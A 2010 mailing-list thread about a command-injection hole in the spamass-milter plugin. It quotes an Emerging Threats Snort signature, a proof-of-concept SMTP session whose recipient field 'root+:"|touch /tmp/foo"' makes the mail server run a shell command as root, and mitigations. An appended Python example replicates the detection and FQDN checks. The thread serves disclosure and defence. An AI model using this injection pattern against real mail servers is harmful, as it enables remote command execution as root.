On Mon, 2010-03-08 at 20:16 +0000, Ned Slider wrote:
> Brian wrote:
> > On Mon, 2010-03-08 at 14:08 -0500, Michael Scheidell wrote:
> >> just a heads up: I don't know if there is a problem with SA milter, but
> >> there is a snort signature for it now.
> >>
> >> -------- Original Message --------
> >> Subject: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote
> >> Arbitrary Command Injection Attempt
> >> Date: Mon, 8 Mar 2010 13:03:52 +0000
> >> From: Kevin Ross <kevros...@googlemail.com>
> >> To: emerging-s...@emergingthreats.net, Matt Jonkman <jonk...@jonkmans.com>
> >>
> >> alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT Possible
> >> SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt";
> >> flow:established,to_server; content:"to|3A|"; nocase;
> >> content:"root+|3A|\"|7C|"; nocase; within:15; classtype:attempted-user;
> >> reference:url,www.securityfocus.com/bid/38578;
> >> reference:url,seclists.org/fulldisclosure/2010/Mar/140; sid:1324412; rev:1;)
> >>
> >> Kev
> >>
> >
> > The key is this:
> >
> > "If spamass-milter is run with the expand flag (-x option) it runs a
> > popen() including the attacker supplied
> > recipient (RCPT TO)."
> >
> > POC IS
> >
> > $ nc localhost 25
> > 220 ownthabox ESMTP Postfix (Ubuntu)
> > mail from: me () me com
> > 250 2.1.0 Ok
> > rcpt to: root+:"|touch /tmp/foo"
> > 250 2.1.5 Ok
> >
> > $ ls -la /tmp/foo
> > -rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
> >
> > Easily mitigated, you shouldn't be accepting mail to non-FQDN addresses
>
> mail from: n...@example.com
> 250 2.1.0 Ok
> rcpt to: root+:"|touch /tmp/foo"
> 504 5.5.2 <root+:|touch /tmp/foo>: Recipient address rejected: need
> fully-qualified address
> quit
> 221 2.0.0 Bye
> Connection closed by foreign host.
> That's a Microsoft kind of answer if you don't mind me saying. Correct me if I'm wrong, but MILTER is (pretty much) native to Sendmail and is a bolt-on after thought for Postfix ;-)
It is easily mitigated by *not* running it with '-x' {Happy then **WITHOUT** Postfix}
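An added example, not from this thread nor from the spamass-milter or Emerging Threats projects: a Python sketch of the two defensive checks the thread discusses, run over constructed RCPT TO lines. The `within:15` logic follows the Snort rule quoted above as I read it, and the FQDN test is an approximation of what Postfix's reject_non_fqdn_recipient enforces, not Postfix's code.

```python
import re

# Constructed sample RCPT TO lines as an MTA would see them on port 25.
# The first two mirror the thread's examples; the rest are ordinary traffic.
SAMPLE_RCPT_LINES = [
    'rcpt to: root+:"|touch /tmp/foo"',
    'RCPT TO:<root+:"|touch /tmp/foo">',
    'rcpt to:<alice@example.com>',
    'rcpt to: postmaster',
    'rcpt to:<bob+tag@mail.example.org>',
]

FIRST = 'to:'        # content:"to|3A|"; nocase
SECOND = 'root+:"|'  # content:"root+|3A|\"|7C|"; nocase


def snort_rule_matches(line: str) -> bool:
    """Replicates the quoted ET rule: SECOND must end within 15 bytes
    after the end of the FIRST match (Snort 'within' semantics)."""
    data = line.lower()
    first = data.find(FIRST)
    if first < 0:
        return False
    end_first = first + len(FIRST)
    second = data.find(SECOND, end_first)
    return second >= 0 and (second + len(SECOND) - end_first) <= 15


# Approximation (assumption, not Postfix source): local part, '@', and a
# domain containing at least one dot, as a non-FQDN reject policy requires.
FQDN_RCPT = re.compile(r'^[^@\s<>]+@([A-Za-z0-9-]+\.)+[A-Za-z0-9-]+$')


def extract_recipient(line: str) -> str:
    """Strip the RCPT TO command and optional angle brackets."""
    addr = re.sub(r'^\s*rcpt\s+to\s*:\s*', '', line, flags=re.IGNORECASE).strip()
    return addr[1:-1] if addr.startswith('<') and addr.endswith('>') else addr


def is_fqdn_recipient(addr: str) -> bool:
    return FQDN_RCPT.fullmatch(addr) is not None


def triage(lines):
    """For each line: (line, IDS rule would fire, FQDN policy would accept)."""
    return [(ln, snort_rule_matches(ln), is_fqdn_recipient(extract_recipient(ln)))
            for ln in lines]


if __name__ == "__main__":
    for line, fires, accepted in triage(SAMPLE_RCPT_LINES):
        print(f"{'ALERT ' if fires else '      '}{'accept' if accepted else 'reject'}  {line}")
```

The FQDN policy is a perimeter filter that happens to stop this PoC at RCPT time; the thread's other mitigation, not running spamass-milter with -x, removes the popen() path itself.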